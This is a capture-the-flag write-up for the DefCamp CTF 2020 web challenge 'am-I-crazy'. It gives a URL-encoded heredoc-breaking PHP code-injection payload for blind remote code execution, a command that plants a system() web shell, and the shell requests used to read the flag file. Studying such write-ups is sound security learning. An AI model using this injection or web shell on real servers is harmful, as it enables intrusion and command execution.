# DefCamp CTF 2020 – am-I-crazy

* **Category:** web  
* **Points:** ?

## Challenge

> You might see but you cannot feel.  
>  
> Flag format: CTF{sha256}  
>  
> The challenge was proposed by BIT SENTINEL.  
>  
> 35.198.103.37:31239

## Solution

The page will show the following HTML code.

```html
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">

<title>AM-I-CRAZY</title>

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

</head>

<body>

<div class="container">

<div class="jumbotron">
<h1 class="display-3">AM I CRAZY</h1>

Use a random password and the bellow button to generate or restore to the initial state the challenge.
<form method="POST" action="/">
<div class="form-group" style=""><label>Password:</label><input pattern=".{8,}" name="password" type="password" class="form-control" style="display: block; position: static; float: none;" required></div>

<button type="submit" class="btn btn-lg btn-success" href="#" role="button">Generate</button>

</form>
</div>

</div>

</body>
</html>
```

You have to insert a password of at least 8 characters.

Submitting eight `a`s opens the URL
`http://35.198.103.37:31239/secrets/64f79ab242648e5c493c6af52ee4469a/index.php`,
whose content is shown below as the browser renders the PHP source: the browser
treats everything from the opening `<?php` up to the first `>` as a bogus
comment, so the beginning of the file is not visible.

```php
10 15){
$_GET['tryharder'] = 0;
}
$contents = file_get_contents(__FILE__);
$search_pattern = '/\$var = <<<xd\s*(.*)\s*xd/im';
preg_match($search_pattern, $contents, $matches);

$new_contents = preg_replace_callback($search_pattern, function($matches) {
return str_replace($matches[1], $_GET['tryharder'], $matches[0]);
}, $contents);
file_put_contents(__FILE__, $new_contents, LOCK_EX);
});
```

After the button press, you are redirected to a page at a URL like
`/secrets/3db406bb8ed1399d75a88f31b9aac730/index.php`.

Here you can specify a value for the `tryharder` parameter, which the script
splices into its own source in place of the heredoc body.

```
GET /secrets/3db406bb8ed1399d75a88f31b9aac730/index.php?tryharder=<your_value_here> HTTP/1.1
Host: 35.242.253.155:30574
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://35.242.253.155:30574/
Upgrade-Insecure-Requests: 1
```

The following payload uses *code injection* to break out of the *heredoc* and
obtain a blind RCE: the first line `xd;` closes the heredoc early, so the next
line is parsed as PHP, and the backtick operator runs whatever is passed in the
`0` GET parameter as a shell command (blind, because nothing is echoed back).

```php
xd;
`$_GET[0]`;
```

The payload must be URL-encoded.

```  
%78%64%3B%0A%60%24%5F%47%45%54%5B%30%5D%60%3B  
```

Sending it, the page will become the following.

```php
1 15){
$_GET['tryharder'] = 0;
}
$contents = file_get_contents(__FILE__);
$search_pattern = '/\$var = <<<xdxd;
`$_GET[0]`;xd/im';
preg_match($search_pattern, $contents, $matches);

$new_contents = preg_replace_callback($search_pattern, function($matches) {
return str_replace($matches[1], $_GET['tryharder'], $matches[0]);
}, $contents);
file_put_contents(__FILE__, $new_contents, LOCK_EX);
});
```
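To make the self-rewrite concrete, here is an added Python model of the `preg_replace_callback` step shown above (not the challenge's own code): it applies the same regex and flags to a constructed stand-in for `index.php`, shows why the `$search_pattern` line itself gets corrupted (the pattern also matches its own string literal), shows how the payload turns the heredoc body into a closing `xd;`, and ends with the allow-list check a fixed version should apply before splicing user input into source.

```python
import re
from typing import Tuple

# Same pattern and flags as the challenge's index.php: PCRE /.../im maps to re.I | re.M.
PATTERN = re.compile(r"\$var = <<<xd\s*(.*)\s*xd", re.I | re.M)

# Constructed stand-in for the self-modifying index.php: only the lines that matter
# for the rewrite, not the challenge's real file.
INDEX_PHP = r"""<?php
$var = <<<xd
10
xd;
$contents = file_get_contents(__FILE__);
$search_pattern = '/\$var = <<<xd\s*(.*)\s*xd/im';
"""

# The writeup's payload: a premature heredoc terminator followed by a backtick statement.
PAYLOAD = "xd;\n`$_GET[0]`;"


def rewrite(contents: str, tryharder: str) -> str:
    """Mirror of the PHP callback: str_replace($matches[1], value, $matches[0])."""
    return PATTERN.sub(lambda m: m.group(0).replace(m.group(1), tryharder), contents)


def heredoc_body(src: str) -> Tuple[str, str]:
    """Return (heredoc body, first statement after it) as PHP would parse it:
    the body ends at the first line that starts with the closing identifier."""
    lines = src.splitlines()
    start = next(i for i, line in enumerate(lines) if line.startswith("$var = <<<xd")) + 1
    end = next(i for i in range(start, len(lines)) if lines[i].startswith("xd"))
    following = lines[end + 1] if end + 1 < len(lines) else ""
    return "\n".join(lines[start:end]), following


def is_safe_tryharder(value: str) -> bool:
    """Allow-list check for a fixed version: a short alphanumeric token cannot
    carry a newline or the heredoc terminator, so it cannot leave the heredoc."""
    return re.fullmatch(r"[A-Za-z0-9]{1,15}", value) is not None
```

With `"42"` the heredoc body simply becomes `42`, but the pattern line turns into `'/\$var = <<<xd42xd/im'`; with `PAYLOAD` the body becomes empty and the first statement after the heredoc is `` `$_GET[0]`; ``, exactly the file shown above.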

Using the blind RCE, you can execute a command that writes another PHP page
containing a more useful web shell. For example, the following command can be
used (the shell command as sent; it is reconstructed here from the URL-encoded
form below).

```sh
echo 'Output:<br /><code><?php echo system($_GET[0]);?></code>' > shell.php
```

The payload must be URL-encoded.

```  
%65%63%68%6F%20%27%4F%75%74%70%75%74%3A%3C%62%72%20%2F%3E%3C%63%6F%64%65%3E%3C%3F%70%68%70%20%65%63%68%6F%20%73%79%73%74%65%6D%28%24%5F%47%45%54%5B%30%5D%29%3B%3F%3E%3C%2F%63%6F%64%65%3E%27%20%3E%20%73%68%65%6C%6C%2E%70%68%70  
```

Now you have a simpler web shell that returns the output of the executed
command. Commands are passed in the `0` GET parameter.

With this you can discover where the flag is.

```  
http://35.242.253.155:30574/secrets/0641302347967910d65b269202ed912d/shell.php?0=ls%20-al%20../../

Output:  
total 56  
drwxrwxrwx 1 www-data www-data 4096 Dec 6 12:25 .  
drwxr-xr-x 1 root root 4096 Sep 12 2019 ..  
-rw-r--r-- 2 www www 2 Dec 6 10:57 apache2.pid  
-rw-rw-r-- 1 root root 153 Dec 1 08:31 flag.php  
lrwxrwxrwx 1 www www 6 Dec 6 12:25 html -> l/html  
-rw-rw-r-- 1 root root 2692 Dec 1 08:31 index.php  
drwxrwxr-x 1 www www 24576 Dec 6 19:18 secrets
```

You can copy the flag file into the current directory.

```  
http://35.242.253.155:30574/secrets/0641302347967910d65b269202ed912d/shell.php?0=cp%20../../flag.php%20.

http://35.242.253.155:30574/secrets/0641302347967910d65b269202ed912d/shell.php?0=ls%20-al

Output:  
total 44  
drwxr-xr-x 2 www www 4096 Dec 6 19:35 .  
drwxrwxr-x 1 www www 24576 Dec 6 19:18 ..  
-rw-r--r-- 1 www www 153 Dec 6 19:35 flag.php  
-rw-r--r-- 1 www www 770 Dec 6 19:31 index.php  
-rw-r--r-- 1 www www 57 Dec 6 19:31 shell.php
```

And print the flag file's content.

```  
http://35.242.253.155:30574/secrets/0641302347967910d65b269202ed912d/shell.php?0=cat%20flag.php

Output:

```

The rendered page shows nothing here, presumably because `flag.php` is PHP
source and the browser hides what sits inside its `<?php ... ?>` tags; the raw
response (page source) contains the flag, which is the following.

```  
CTF{d067ddd00ba4129e83898758ac321533f392364cfaca7967d66791d9d08823bb}  
```

Original writeup: https://github.com/m3ssap0/CTF-Writeups/blob/master/DefCamp%20CTF%202020/am-I-crazy/README.md